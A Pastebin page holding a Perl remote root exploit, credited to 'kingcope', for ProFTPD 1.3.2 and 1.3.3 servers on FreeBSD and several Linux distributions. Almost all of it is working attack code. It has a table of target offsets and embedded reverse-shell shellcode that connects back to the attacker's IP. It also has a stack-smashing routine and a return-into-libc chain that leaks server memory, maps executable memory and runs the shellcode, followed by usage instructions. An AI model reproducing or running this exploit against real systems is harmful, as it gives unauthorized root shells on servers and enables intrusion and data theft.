API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 25th, 2017
83
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.63 KB | None | 0 0
raw download clone embed print report
  1. # proftpd IAC remote r00t exploit by kingcope
  2. # version 1.6 unlocks bsd & lnx!!
  3. # Nov2010
  4.  
  5. use IO::Socket;
  6.  
  7. $numtargets = 12;
  8.  
  9. @targets =
  10. (
  11. # Plain Stack Smashing
  12.  
  13. #Confirmed to work
  14. ["FreeBSD 8.1 i386, ProFTPD 1.3.3a Server (binary)",# PLATFORM SPEC
  15. "FreeBSD", # OPERATING SYSTEM
  16. 0, # EXPLOIT STYLE
  17. 0xbfbfe000, # OFFSET START
  18. 0xbfbfff00, # OFFSET END
  19. 1029], # ALIGN
  20.  
  21. #Confirmed to work
  22. ["FreeBSD 8.0/7.3/7.2 i386, ProFTPD 1.3.2a/e/c Server (binary)",
  23. "FreeBSD",
  24. 0,
  25. 0xbfbfe000,
  26. 0xbfbfff00,
  27. 1021],
  28.  
  29. # Return into Libc
  30.  
  31. #Confirmed to work
  32. ["Debian GNU/Linux 5.0, ProFTPD 1.3.2e Server (Plesk binary)",
  33. "Linux",
  34. 1, # EXPLOIT STYLE
  35. 0x0804CCD4, # write(2) offset
  36. 8189, # ALIGN
  37. 0], # PADDING
  38. #Confirmed to work
  39. ["Debian GNU/Linux 4.0, ProFTPD 1.3.2e Server (Plesk binary)",
  40. "Linux",
  41. 1,
  42. 0x0804C9A4,
  43. 8189,
  44. 0],
  45. #Confirmed to work
  46. ["Debian Linux Squeeze/sid, ProFTPD 1.3.3a Server (distro binary)",
  47. "Linux",
  48. 1,
  49. 0x080532D8,
  50. 4101,
  51. 12],
  52.  
  53. ["SUSE Linux 9.3, ProFTPD 1.3.2e Server (Plesk binary)",
  54. "Linux",
  55. 1,
  56. 0x0804C9C4,
  57. 8189,
  58. 0],
  59.  
  60. ["SUSE Linux 10.0/10.3, ProFTPD 1.3.2e Server (Plesk binary)",
  61. "Linux",
  62. 1,
  63. 0x0804CAA8,
  64. 8189,
  65. 0],
  66.  
  67. ["SUSE Linux 10.2, ProFTPD 1.3.2e Server (Plesk binary)",
  68. "Linux",
  69. 1,
  70. 0x0804CBBC,
  71. 8189,
  72. 0],
  73.  
  74. ["SUSE Linux 11.0, ProFTPD 1.3.2e Server (Plesk binary)",
  75. "Linux",
  76. 1,
  77. 0x0804CCBC,
  78. 8189,
  79. 0],
  80.  
  81. #Confirmed to work
  82. ["SUSE Linux 11.1, ProFTPD 1.3.2e Server (Plesk binary)",
  83. "Linux",
  84. 1,
  85. 0x0804CCE0,
  86. 8189,
  87. 0],
  88.  
  89. ["SUSE Linux SLES 10, ProFTPD 1.3.2e Server (Plesk binary)",
  90. "Linux",
  91. 1,
  92. 0x0804CA2C,
  93. 8189,
  94. 0],
  95.  
  96. #Confirmed to work
  97. ["CentOS 5, ProFTPD 1.3.2e Server (Plesk binary)",
  98. "Linux",
  99. 1,
  100. 0x0804C290,
  101. 8189,
  102. 0],
  103.  
  104. # feel free to add more targets.
  105. );
  106.  
  107. #freebsd reverse shell port 45295
  108. #setup a netcat on this port ^^
  109. $bsdcbsc =
  110. # setreuid
  111. "\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80".
  112. # connect back :>
  113. "\x31\xc0\x31\xdb\x53\xb3\x06\x53".
  114. "\xb3\x01\x53\xb3\x02\x53\x54\xb0".
  115. "\x61\xcd\x80\x31\xd2\x52\x52\x68".
  116. "\x41\x41\x41\x41\x66\x68\xb0\xef".
  117. "\xb7\x02\x66\x53\x89\xe1\xb2\x10".
  118. "\x52\x51\x50\x52\x89\xc2\x31\xc0".
  119. "\xb0\x62\xcd\x80\x31\xdb\x39\xc3".
  120. "\x74\x06\x31\xc0\xb0\x01\xcd\x80".
  121. "\x31\xc0\x50\x52\x50\xb0\x5a\xcd".
  122. "\x80\x31\xc0\x31\xdb\x43\x53\x52".
  123. "\x50\xb0\x5a\xcd\x80\x31\xc0\x43".
  124. "\x53\x52\x50\xb0\x5a\xcd\x80\x31".
  125. "\xc0\x50\x68\x2f\x2f\x73\x68\x68".
  126. "\x2f\x62\x69\x6e\x89\xe3\x50\x54".
  127. "\x53\x50\xb0\x3b\xcd\x80\x31\xc0".
  128. "\xb0\x01\xcd\x80";
  129.  
  130. #linux reverse shell port 45295 by bighawk
  131. #setup a netcat on this port ^^
  132. $lnxcbsc =
  133. # setreuid
  134. "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x90\x90\x90".
  135. # connect back :>
  136. "\x6a\x66".
  137. "\x58".
  138. "\x6a\x01".
  139. "\x5b".
  140. "\x31\xc9".
  141. "\x51".
  142. "\x6a\x01".
  143. "\x6a\x02".
  144. "\x89\xe1".
  145. "\xcd\x80".
  146. "\x68\x7f\x7f\x7f\x7f". # IP
  147. "\x66\x68\xb0\xef". # PORT
  148. "\x66\x6a\x02".
  149. "\x89\xe1".
  150. "\x6a\x10".
  151. "\x51".
  152. "\x50".
  153. "\x89\xe1".
  154. "\x89\xc6".
  155. "\x6a\x03".
  156. "\x5b".
  157. "\x6a\x66".
  158. "\x58".
  159. "\xcd\x80".
  160. "\x87\xf3".
  161. "\x6a\x02".
  162. "\x59".
  163. "\xb0\x3f".
  164. "\xcd\x80".
  165. "\x49".
  166. "\x79\xf9".
  167. "\xb0\x0b".
  168. "\x31\xd2".
  169. "\x52".
  170. "\x68\x2f\x2f\x73\x68".
  171. "\x68\x2f\x62\x69\x6e".
  172. "\x89\xe3".
  173. "\x52".
  174. "\x53".
  175. "\x89\xe1".
  176. "\xcd\x80";
  177.  
  178. sub exploit1 {
  179. for ($counter=$targets[$ttype][3]; $counter < $targets[$ttype][4]; $counter += 250) {
  180. printf("[$target] CURRENT OFFSET = %08x :pP\n", $counter);
  181. $ret = pack("V", $counter);
  182. $align = $targets[$ttype][5];
  183.  
  184. my $sock = IO::Socket::INET->new(PeerAddr => $target,
  185. PeerPort => 21,
  186. Proto => 'tcp');
  187.  
  188. $stack = "KCOPERULEZKCOPERULEZKC" . $ret . "\x90" x 500 . $shellcode . "A" x 10;
  189.  
  190. $v = <$sock>;
  191.  
  192. print $sock "\x00" x $align . "\xff" . $stack . "\n";
  193.  
  194. close($sock);
  195. }
  196. }
  197.  
  198. # Linux technique to retrieve a rootshell (C) kingcope 2010
  199. #
  200. # uses write(2) to fetch process memory out of the remote box (you can find the offset using IDA)
  201. # only the write(2) plt entry offset is needed for the exploit to work (and of course the
  202. # align value)
  203. # once the correct write value is given to the exploit it fetches the memory space of proftpd.
  204. # with this information the exploit can find function entries and byte values
  205. # relative to the write(2) address.
  206. # once the memory is read out the exploit does the following to circumvent linux adress space
  207. # randomization:
  208. #
  209. # 1.) calculate mmap64() plt entry
  210. # 2.) seek for assembly instructions in the proftpd memory space relative to write(2)
  211. # such as pop pop ret instructions
  212. # 3.) call mmap64() to map at address 0x10000000 with protection read,write,execute
  213. # 4.) calculate offset for memcpy() which is later used to construct the shellcode copy routine
  214. # 4.) copy known assembly instructions (which have been found before using the memory read)
  215. # to address 0x10000000. these instructions will copy the shellcode from ESP to 0x10000100
  216. # and make use of the memcpy found before
  217. # 5.) actually jump to the shellcode finder
  218. # 6.) once the shellcode has been copied to 0x10000100 jump to it
  219. # 7.) shellcode gets executed and we have our desired root shell.
  220.  
  221. sub exploit2 {
  222. printf("[$target] %s :pP\n", $targets[$ttype][0]);
  223. $align = $targets[$ttype][4];
  224. $write_offset = $targets[$ttype][3];
  225. $padding = $targets[$ttype][5];
  226.  
  227. $|=1;
  228. print "align = $align\n";
  229. print "Seeking for write(2)..\n";
  230.  
  231. #known good write(2) values
  232. #0x0804C290
  233. #0x0804A85C
  234. #0x0804A234
  235. #0x08052830
  236. #080532D8 proftpd-basic_1.3.3a-4_i386
  237. #08052938 proftpd-basic_1.3.2e-4_i386 (ubunutu)
  238. #0804CCD4 psa-proftpd_1.3.2e-debian5.0.build95100504.17_i386 !!
  239.  
  240. printf "Using write offset %08x.\n", $write_offset;
  241. $k = $write_offset;
  242. $sock = IO::Socket::INET->new(PeerAddr => $target,
  243. PeerPort => 21,
  244. Proto => 'tcp');
  245.  
  246. $sock->sockopt(SO_LINGER, pack("ii", 1, 0));
  247. #$x = <stdin>;
  248. $stack = "KCOPERULEZKCOPERULEZKC". "C" x $padding .
  249. pack("V", $k). # write
  250. "\xcc\xcc\xcc\xcc".
  251. "\x01\x00\x00\x00". # fd for write
  252. pack("V", $k). # buffer for write
  253. "\xff\xff\x00\x00"; # length for write
  254.  
  255. $v = <$sock>;
  256.  
  257. print $sock "\x00" x $align . "\xff" . $stack . "\n";
  258.  
  259. vec ($rfd, fileno($sock), 1) = 1;
  260.  
  261. $timeout = 2;
  262. if (select ($rfd, undef, undef, $timeout) >= 0
  263. && vec($rfd, fileno($sock), 1))
  264. {
  265. if (read($sock, $buff, 0xffff) == 0xffff) {
  266. printf "\nSUCCESS. write(2) is at %08x\n", $k;
  267. close($sock);
  268. goto lbl1;
  269. }
  270. }
  271.  
  272. close($sock);
  273. printf "wrong write(2) offset.\n";
  274. exit;
  275.  
  276. lbl1:
  277. # Once we're here chances are good that we get the root shell
  278.  
  279. print "Reading memory from server...\n";
  280. my $sock = IO::Socket::INET->new(PeerAddr => $target,
  281. PeerPort => 21,
  282. Proto => 'tcp');
  283.  
  284. $stack = "KCOPERULEZKCOPERULEZKC" . "C" x $padding .
  285. pack("V", $k). # write
  286. "\xcc\xcc\xcc\xcc".
  287. "\x01\x00\x00\x00". # fd for write
  288. pack("V", $k). # buffer for write
  289. "\xff\xff\x0f\x00"; # length for write
  290.  
  291. $v = <$sock>;
  292.  
  293. print $sock "\x00" x $align . "\xff" . $stack . "\n";
  294.  
  295. read($sock, $buff, 0xfffff);
  296.  
  297. if (($v = index $buff, "\x5E\x5F\x5D") >= 0) {
  298. $pop3ret = $k + $v;
  299. printf "pop pop pop ret located at %08x\n", $pop3ret;
  300. } else {
  301. print "Could not find pop pop pop ret\n";
  302. exit;
  303. }
  304.  
  305. if (($v = index $buff, "\x83\xC4\x20\x5B\x5E\x5D\xC3") >= 0) {
  306. $largepopret = $k + $v;
  307. printf "large pop ret located at %08x\n", $largepopret;
  308. } else {
  309. print "Could not find pop pop pop ret\n";
  310. exit;
  311. }
  312.  
  313. if (($v = index $buff, "\xC7\x44\x24\x08\x03\x00\x00\x00\xC7\x04\x24\x00\x00\x00\x00\x89\x44\x24\x04") >= 0) {
  314. $addr1 = $k+$v+23;
  315.  
  316. $mmap64 = unpack("I", substr($buff, $v+20, 4));
  317. $mmap64 = $addr1 - (0xffffffff-$mmap64);
  318. printf "mmap64 is located at %08x\n", $mmap64;
  319. } else {
  320. if (($v = index $buff, "\x89\x44\x24\x10\xA1\xBC\xA5\x0F\x08\x89\x44\x24\x04\xe8") >= 0) {
  321. $addr1 = $k+$v+17;
  322.  
  323. $mmap64 = unpack("I", substr($buff, $v+14, 4));
  324. $mmap64 = $addr1 - (0xffffffff-$mmap64);
  325. printf "mmap64 is located at %08x\n", $mmap64;
  326. } else {
  327. print "Could not find mmap64()\n";
  328. exit;
  329. }
  330. }
  331.  
  332.  
  333.  
  334. if (($v = index $buff, "\x8D\x45\xF4\x89\x04\x24\x89\x54\x24\x08\x8B\x55\x08\x89\x54\x24\x04\xE8") >= 0) {
  335. $addr1 = $k+$v+21;
  336. $memcpy = unpack("I", substr($buff, $v+18, 4));
  337. $memcpy = $addr1 - (0xffffffff-$memcpy);
  338. printf "memcpy is located at %08x\n", $memcpy;
  339. } else {
  340.  
  341. if (($v = index $buff, "\x8B\x56\x10\x89\x44\x24\x08\x89\x54\x24\x04\x8B\x45\xE4\x89\x04\x24\xe8") >= 0) {
  342. $addr1 = $k+$v+21;
  343.  
  344. $memcpy = unpack("I", substr($buff, $v+18, 4));
  345. $memcpy = $addr1 - (0xffffffff-$memcpy);
  346. printf "memcpy is located at %08x\n", $memcpy;
  347. } else {
  348. if (($v = index $buff, "\x89\x44\x24\x04\xA1\xBC\x9F\x0E\x08\x89\x04\x24") >= 0) {
  349. $addr1 = $k+$v+16;
  350.  
  351. $memcpy = unpack("I", substr($buff, $v+13, 4));
  352. $memcpy = $addr1 - (0xffffffff-$memcpy);
  353. printf "memcpy is located at %08x\n", $memcpy;
  354. } else {
  355. if (($v = index $buff, "\x89\x7C\x24\x04\x89\x1C\x24\x89\x44\x24\x08") >= 0) {
  356. $addr1 = $k+$v+15;
  357.  
  358. $memcpy = unpack("I", substr($buff, $v+12, 4));
  359. $memcpy = $addr1 - (0xffffffff-$memcpy);
  360. printf "memcpy is located at %08x\n", $memcpy;
  361.  
  362. } else {
  363. if (($v = index $buff, "\x8B\x55\x10\x89\x74\x24\x04\x89\x04\x24\x89\x54\x24\x08") >= 0) {
  364. $addr1 = $k+$v+18;
  365. $memcpy = unpack("I", substr($buff, $v+15, 4));
  366. $memcpy = $addr1 - (0xffffffff-$memcpy);
  367. printf "memcpy is located at %08x\n", $memcpy;
  368. } else {
  369.  
  370. print "Could not find memcpy()\n";
  371. exit;
  372. }
  373. }
  374. }
  375. }
  376. }
  377.  
  378. if (($v = index $buff, "\xfc\x8b") >= 0) {
  379. $byte1 = $k+$v;
  380. printf ("byte1: %08x\n", $byte1);
  381. } else {
  382. print "Could not find a special byte\n";
  383. exit;
  384. }
  385.  
  386. if (($v = index $buff, "\xf4") >= 0) {
  387. $byte2 = $k+$v;
  388. printf ("byte2: %08x\n", $byte2);
  389. } else {
  390. print "Could not find a special byte\n";
  391. exit;
  392. }
  393.  
  394. if (($v = index $buff, "\xbf") >= 0) {
  395. $byte3 = $k+$v;
  396. printf ("byte3: %08x\n", $byte3);
  397. } else {
  398. print "Could not find a special byte\n";
  399. exit;
  400. }
  401.  
  402. if (($v = index $buff, "\x00\x01\x00") >= 0) {
  403. $byte4 = $k+$v;
  404. printf ("byte4: %08x\n", $byte4);
  405. } else {
  406. print "Could not find a special byte\n";
  407. exit;
  408. }
  409.  
  410. if (($v = index $buff, "\x10") >= 0) {
  411. $byte5 = $k+$v;
  412. printf ("byte5: %08x\n", $byte5);
  413. } else {
  414. print "Could not find a special byte\n";
  415. exit;
  416. }
  417.  
  418. if (($v = index $buff, "\xB9\x00\x02\x00\x00") >= 0) {
  419. $byte6 = $k+$v;
  420. printf ("byte6: %08x\n", $byte6);
  421. } else {
  422. print "Could not find a special byte\n";
  423. exit;
  424. }
  425.  
  426.  
  427. if (($v = index $buff, "\xf3") >= 0) {
  428. $byte7 = $k+$v;
  429. printf ("byte7: %08x\n", $byte7);
  430. } else {
  431. print "Could not find a special byte\n";
  432. exit;
  433. }
  434.  
  435. if (($v = index $buff, "\xA4") >= 0) {
  436. $byte8 = $k+$v;
  437. printf ("byte8: %08x\n", $byte8);
  438. } else {
  439. print "Could not find a special byte\n";
  440. exit;
  441. }
  442.  
  443. if (($v = index $buff, "\xeb\xff") >= 0) {
  444. $byte9 = $k+$v;
  445. printf ("byte9: %08x\n", $byte9);
  446. } else {
  447. print "Could not find a special byte\n";
  448. exit;
  449. }
  450.  
  451. # shellcode copy routine:
  452. #0100740B FC CLD
  453. #0100740C 8BF4 MOV ESI,ESP
  454. #0100740E BF 00010010 MOV EDI,10000100
  455. #01007413 B9 00020000 MOV ECX,200
  456. #01007418 F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
  457. # EB FF JMP +0xFF
  458. # FC 8B
  459. # F4 BF
  460. # 00 01 00
  461. # 10
  462. # B9 00 02 00 00
  463. # F3:A4
  464. # EB FF
  465.  
  466. # El1Te X-Ploit TechNiqUe (C)
  467.  
  468. print "Building exploit buffer\n";
  469.  
  470. $stack = "KCOPERULEZKCOPERULEZKC" . "C" x $padding .
  471. pack("V", $mmap64). # mmap64()
  472. pack("V", $largepopret). # add esp, 20h; pop; pop
  473. "\x00\x00\x00\x10". # mmap start
  474. "\x00\x10\x00\x00". # mmap size
  475. "\x07\x00\x00\x00". # mmap prot
  476. "\x32\x00\x00\x00". # mmap flags
  477. "\xff\xff\xff\xff". # mmap fd
  478. "\x00\x00\x00\x00". # mmap offset
  479. "\x00\x00\x00\x00". # mmap offset
  480. "\x00\x00\x00\x00".
  481. "\x00\x00\x00\x00".
  482. "\x00\x00\x00\x00".
  483. "\x00\x00\x00\x00".
  484. pack("V", $memcpy). # memcpy()
  485. pack("V", $pop3ret). # pop; pop; pop; retn
  486. "\x00\x00\x00\x10". # destination
  487. pack("V", $byte1). # origin
  488. "\x02\x00\x00\x00". # number of bytes to copy
  489.  
  490. pack("V", $memcpy). # memcpy()
  491. pack("V", $pop3ret). # pop; pop; pop; retn
  492. "\x02\x00\x00\x10". # destination
  493. pack("V", $byte2). # origin
  494. "\x01\x00\x00\x00". # number of bytes to copy
  495.  
  496. pack("V", $memcpy). # memcpy()
  497. pack("V", $pop3ret). # pop; pop; pop; retn
  498. "\x03\x00\x00\x10". # destination
  499. pack("V", $byte3). # origin
  500. "\x01\x00\x00\x00". # number of bytes to copy
  501.  
  502. pack("V", $memcpy). # memcpy()
  503. pack("V", $pop3ret). # pop; pop; pop; retn
  504. "\x04\x00\x00\x10". # destination
  505. pack("V", $byte4). # origin
  506. "\x03\x00\x00\x00". # number of bytes to copy
  507.  
  508. pack("V", $memcpy). # memcpy()
  509. pack("V", $pop3ret). # pop; pop; pop; retn
  510. "\x07\x00\x00\x10". # destination
  511. pack("V", $byte5). # origin
  512. "\x01\x00\x00\x00". # number of bytes to copy
  513.  
  514. pack("V", $memcpy). # memcpy()
  515. pack("V", $pop3ret). # pop; pop; pop; retn
  516. "\x08\x00\x00\x10". # destination
  517. pack("V", $byte6). # origin
  518. "\x05\x00\x00\x00". # number of bytes to copy
  519.  
  520. pack("V", $memcpy). # memcpy()
  521. pack("V", $pop3ret). # pop; pop; pop; retn
  522. "\x0d\x00\x00\x10". # destination
  523. pack("V", $byte7). # origin
  524. "\x01\x00\x00\x00". # number of bytes to copy
  525.  
  526. pack("V", $memcpy). # memcpy()
  527. pack("V", $pop3ret). # pop; pop; pop; retn
  528. "\x0e\x00\x00\x10". # destination
  529. pack("V", $byte8). # origin
  530. "\x01\x00\x00\x00". # number of bytes to copy
  531.  
  532. pack("V", $memcpy). # memcpy()
  533. pack("V", $pop3ret). # pop; pop; pop; retn
  534. "\x0f\x00\x00\x10". # destination
  535. pack("V", $byte9). # origin
  536. "\x02\x00\x00\x00". # number of bytes to copy
  537.  
  538. "\x00\x00\x00\x10". # JUMP TO 0x10000000 rwxp address
  539.  
  540. "\x90" x 100 . $shellcode . "\x90" x 10;
  541.  
  542. print "Sending exploit buffer!\n";
  543.  
  544. my $sock = IO::Socket::INET->new(PeerAddr => $target,
  545. PeerPort => 21,
  546. Proto => 'tcp');
  547. $v = <$sock>;
  548.  
  549. print $sock "\x00" x $align . "\xff" . $stack . "\n";
  550.  
  551. print "Check your netcat?\n";
  552.  
  553. while(<$sock>) {
  554. print;
  555. }
  556. }
  557.  
  558. sub usage() {
  559. print "written by kingcope\n";
  560. print "usage:\n".
  561. "proremote.pl <target ip/host> <your ip> <target type>\n\n";
  562. for ($i=0; $i<$numtargets; $i++) {
  563. print "\t[".$i."]\t". $targets[$i][0]. "\r\n";
  564. }
  565.  
  566. exit;
  567. }
  568.  
  569. if ($#ARGV ne 2) { usage; }
  570.  
  571. $target = $ARGV[0];
  572. $cbip = $ARGV[1];
  573. $ttype = $ARGV[2];
  574.  
  575. $platform = $targets[$ttype][1];
  576. $style = $targets[$ttype][2];
  577.  
  578. ($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
  579.  
  580. if ($platform eq "FreeBSD") {
  581. $shellcode = $bsdcbsc;
  582. substr($shellcode, 37, 4, $a1 . $a2 . $a3 . $a4);
  583. } else {
  584. if ($platform eq "Linux") {
  585. $shellcode = $lnxcbsc;
  586. substr($shellcode, 31, 4, $a1 . $a2 . $a3 . $a4);
  587. } else {
  588. print "typo ?\n";
  589. exit;
  590. }}
  591.  
  592. if ($style eq 0) {
  593. exploit1;
  594. } else {
  595. exploit2;
  596. }
  597.  
  598. print "done.\n";
  599. exit;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!